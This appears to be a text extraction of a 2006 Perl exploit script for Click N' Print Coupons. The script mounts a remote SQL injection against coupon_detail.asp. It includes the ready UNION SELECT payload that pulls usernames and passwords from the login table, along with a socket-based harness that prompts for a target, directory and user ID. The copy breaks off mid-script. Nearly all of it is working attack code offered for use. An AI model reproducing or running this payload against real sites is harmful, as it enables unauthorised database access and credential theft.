Click N Print Coupons V2006.01 key Remote SQL Injection Exploit.pdf

1 #!/usr/bin/perl 2 #[Script Name: Click N’ Print Coupons <= V2005.01 (key) Remote SQL Injection Exploit 3 #[Coded by : ajann 4 #[Author : ajann 5 #[Contact : :( 6 #[S.Page : http://www.websitedesignsforless.com 7 #[$ : $9.95 8 #[Message : Tum Musluman Aleminin Kurban Bayrami Mubarek Olsun #.. 9 #[.. : ajann,Turkey 10 11 # 2006.01 //coupon_detail.asp?key=−1%20union%20select%200,0,xusername,0,0,xpassword,0,0,0,0,0,0,0,0,0%20from%20login% 20where%20id%20like%201 12 13 14 use IO::Socket; 15 if(@ARGV < 1){ 16 print " 17 [======================================================================== 18 [// Click N’ Print Coupons <= V2005.01 (key) Remote SQL Injection Exploit 19 [// Usage: exploit.pl [target] 20 [// Example: exploit.pl victim.com 21 [// Example: exploit.pl victim.com 22 [// Vuln&Exp : ajann 23 [======================================================================== 24 "; 25 exit(); 26 } 27 #Local variables 28 $server = $ARGV[0]; 29 $server =~ s/(http:\/\/)//eg; 30 $host = "http://".$server; 31 $port = "80"; 32 $file = "/coupon_detail.asp?key="; 33 34 print "Script <DIR> : "; 35 $dir = <STDIN>; 36 chop ($dir); 37 38 if ($dir =~ /exit/){ 39 print "−− Exploit Failed[You Are Exited] \n"; 40 exit(); 41 } 42 43 if ($dir =~ /\//){} 44 else { 45 print "−− Exploit Failed[No DIR] \n"; 46 exit(); 47 } 48 49 print "User <ID> : "; 50 $ID = <STDIN>; 51 chop ($ID); Page 1/2 Click N Print Coupons V2006.01 key Remote SQL Injection Exploit ajann 12/30/2006 52 53 if ($ID =~ /exit/){ 54 print "−− Exploit Failed[You Are Exited] \n"; 55 exit(); 56 } 57 58 $len=length($ID); 59 60 if ($len == 1){} 61 else { 62 print "−− Exploit Failed[No User Id] \n"; 63 exit(); 64 } 65 66 $target = "−1%20union%20select%200,0,0,xusername,xpassword,0,0,0,0,0,0,0,0,0%20from%20login%20where%20id%20like%20".$ID; 67 $target = $host.$dir.$file.$target; 68 69 #Writing data to socket 70 print "+********************************************